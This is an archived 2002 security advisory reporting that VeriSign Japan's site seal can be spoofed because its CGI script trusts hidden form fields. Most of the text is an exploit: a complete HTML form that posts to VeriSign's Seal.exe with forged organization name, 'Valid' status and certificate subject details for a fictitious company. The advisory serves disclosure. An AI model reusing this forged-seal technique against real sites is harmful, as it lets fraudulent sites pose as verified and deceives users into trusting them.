3rd Jul 2002 [SBWID-5506]
COMMAND
Verisign seal can be falsified
SYSTEMS AFFECTED
Problem is reported in the Japanese version of VeriSign seals. Other
versions at risk ??
PROBLEM
Thanks to vagabond [http://www.vagabond.co.jp] findings, Noam Rathaus
[http://www.beyondsecurity.com] posted :
VeriSign\'s Seal displays parameters when it transfers them from the
form to CGI script. At this point the company name and other
information used in authentication, which is hidden in the form but
displayed when the authentication process is complete, is transferred.
Thus, the authentication window used by VeriSign\'s seal can be spoofed
by preparing a page set with the hidden elements containing the
information the attacker wants to spoof.
Exploit
=======
Appended below is the source code for the VeriSign form. Virtually all
of the hidden information can be rewritten. All of the content
rewritten onto VeriSign Japan\'s authentication window is clearly
displayed.
<INPUT type=hidden name=\"VS_ORGANIZATION\" value=\"USO-DAPYON\">
For example, \"USO-DAPYON\" in value =\"USO-DAPYON\" in the above string can be
displayed by rewriting it to a different character string.
<FORM NAME=form1 METHOD=POST
ACTION=\"https://www.verisign.co.jp/cgi-bin/Seal.exe\"><INPUT type=hidden
name=\"VHTML_FILE\" value=\"../htmldocs/query/authCertDisplay.htm\">
<INPUT type=hidden name=\"STATUS\" value=\"0\">
<INPUT type=hidden name=\"qmRowOffset\" value=\"\">
<INPUT type=hidden name=\"qmStartRecNumber\" value=\"\">
<INPUT type=hidden name=\"qmRecNumber\" value=\"\">
<INPUT type=hidden name=\"VS_ORGANIZATION\" value=\"USO-DAPYON\">
<INPUT type=hidden name=\"form_file\" value=\"../fdf/authCertByIssuer.fdf\">
<INPUT type=hidden name=\"PIPE\" value=\"QUERY_MANAGER\">
<INPUT type=hidden name=\"VS_VALID_END\" value=\"99-MAR-99\">
<INPUT type=hidden name=\"qmCompileAlways\" value=\"yes\">
<INPUT type=hidden name=\"unstructured_addr\" value=\"\">
<INPUT type=hidden name=\"CERT_MSG\" value=\"\">
<INPUT type=hidden name=\"VS_CERT_SERIAL\" value=\"\">
<INPUT type=hidden name=\"VS_CERT_FLAGS\" value=\"0\">
<INPUT type=hidden name=\"VS_STATUS\" value=\"Valid\">
<INPUT type=hidden name=\"url_encode\" value=\"no\">
<INPUT type=hidden name=\"issuerSerial2\" value=\"\">
<INPUT type=hidden name=\"SDATE\" value=\"\">
<INPUT type=hidden name=\"ip_address\" value=\"172.16.185.00\">
<INPUT type=hidden name=\"VS_SUBJECT_READABLE\" value=\"Country = JP<BR>State =
Tokyo<BR>Locality = USO <BR>Organizational Unit = Terms of use at
www.verisign.co.jp/RPA (c)00<BR>Organizational Unit = Authenticated by
VeriSign Japan K.K.<BR>Organizational Unit = Member, VeriSign Trust
Network<BR>Organization = USO Inc.<BR>Organizational Unit = Web System
Div.<BR>Common Name = www.USO-DAPYON.co.jp\">
<INPUT type=hidden name=\"qmStartRecNumber\" value=\"1\">
<INPUT type=hidden name=\"application\" value=\"Mozilla/4.78 [ja] (Windows NT
5.0; U)\">
<INPUT type=hidden name=\"qmRecNumber\" value=\"2\">
<INPUT type=hidden name=\"VS_PRODUCT_NAME\" value=\"Digital ID Class 3 -
Affiliate Global Server AuthCenter\">
<INPUT type=hidden name=\"remote_host\"
value=\"https://www.verisign.co.jp/cgi-bin/siteseal.exe\">
<INPUT type=hidden name=\"common_name\" value=\"\">
<INPUT type=hidden name=\"error_status\" value=\"4000\">
<INPUT type=hidden name=\"VS_VALID_START\" value=\"99-MAR-99\">
<INPUT type=hidden name=\"card_expire\" value=\"\">
<INPUT type=hidden name=\"Template\" value=\"authCertByIssuer\">
<INPUT type=hidden name=\"issuerSerial\" value=\"\">
<INPUT type=hidden name=\"ENDDATE\" value=\"\">
<INPUT type=hidden name=\"server_URL\"
value=\"https://servicecenter.verisign.com\">
<INPUT type=hidden name=\"VS_COMMON_NAME\" value=\"WWW.USO-DAPYON.CO.JP\">
<INPUT type=hidden name=\"END\" value=\"YES\">
<INPUT SRC=\"https://www.verisign.co.jp/images/siteseal/VeriSignSeal.gif\"
TYPE=\"image\" border=0></FORM>
SOLUTION
??
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
